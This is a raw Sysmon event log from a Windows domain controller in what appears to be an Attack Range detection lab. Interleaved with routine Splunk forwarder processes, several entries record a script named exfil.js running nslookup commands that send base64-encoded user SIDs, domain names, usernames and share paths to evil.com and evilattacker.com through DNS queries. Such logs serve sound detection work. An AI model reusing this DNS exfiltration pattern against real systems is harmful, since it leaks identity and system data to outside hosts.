154100x800000000000000074018Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:22.272{A8622C2F-5C0E-6078-7F0F-00000000AE01}616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C0E-6078-7C0F-00000000AE01}5116C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmie.tmp 2>&1 154100x800000000000000074006Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:22.245{A8622C2F-5C0E-6078-7E0F-00000000AE01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073999Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:22.241{A8622C2F-5C0E-6078-7C0F-00000000AE01}5116C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmie.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:20.656{A8622C2F-5C0C-6078-7B0F-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:19.989{A8622C2F-5C0B-6078-7A0F-00000000AE01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073964Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:19.323{A8622C2F-5C0B-6078-790F-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073946Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:17.540{A8622C2F-5C09-6078-780F-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073933Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:16.871{A8622C2F-5C08-6078-770F-00000000AE01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073925Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:16.203{A8622C2F-5C08-6078-760F-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:09.817{A8622C2F-5C01-6078-750F-00000000AE01}5216C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C01-6078-730F-00000000AE01}920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgckw.tmp 2>&1 154100x800000000000000073884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:09.788{A8622C2F-5C01-6078-730F-00000000AE01}920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgckw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.979{A8622C2F-5BF0-6078-720F-00000000AE01}7084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BF0-6078-700F-00000000AE01}5456C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgpy.tmp 2>&1 154100x800000000000000073792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.947{A8622C2F-5BF0-6078-700F-00000000AE01}5456C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgpy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073780Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.335{A8622C2F-5BF0-6078-6F0F-00000000AE01}1736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BF0-6078-6D0F-00000000AE01}3376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvzr.tmp 2>&1 154100x800000000000000073769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.304{A8622C2F-5BF0-6078-6D0F-00000000AE01}3376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvzr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.161{A8622C2F-5BF0-6078-6C0F-00000000AE01}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BF0-6078-6A0F-00000000AE01}1408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjvk.tmp 2>&1 154100x800000000000000073741Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.131{A8622C2F-5BF0-6078-6A0F-00000000AE01}1408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjvk.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073691Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:39.719{A8622C2F-5BE3-6078-690F-00000000AE01}5756C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BE3-6078-670F-00000000AE01}5196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlddtrk.tmp 2>&1 154100x800000000000000073680Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:39.689{A8622C2F-5BE3-6078-670F-00000000AE01}5196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlddtrk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073618Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:22.219{A8622C2F-5BD2-6078-660F-00000000AE01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:22.072{A8622C2F-5BD2-6078-650F-00000000AE01}6248C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BD2-6078-630F-00000000AE01}6084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpqr.tmp 2>&1 154100x800000000000000073599Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:22.042{A8622C2F-5BD2-6078-630F-00000000AE01}6084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpqr.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:20.645{A8622C2F-5BD0-6078-620F-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:19.979{A8622C2F-5BCF-6078-610F-00000000AE01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073564Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:19.312{A8622C2F-5BCF-6078-600F-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:17.480{A8622C2F-5BCD-6078-5F0F-00000000AE01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073538Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:16.810{A8622C2F-5BCC-6078-5E0F-00000000AE01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:16.213{A8622C2F-5BCC-6078-5D0F-00000000AE01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073494Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:09.644{A8622C2F-5BC5-6078-5C0F-00000000AE01}6660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BC5-6078-5A0F-00000000AE01}3368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdtg.tmp 2>&1 154100x800000000000000073483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:09.614{A8622C2F-5BC5-6078-5A0F-00000000AE01}3368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdtg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 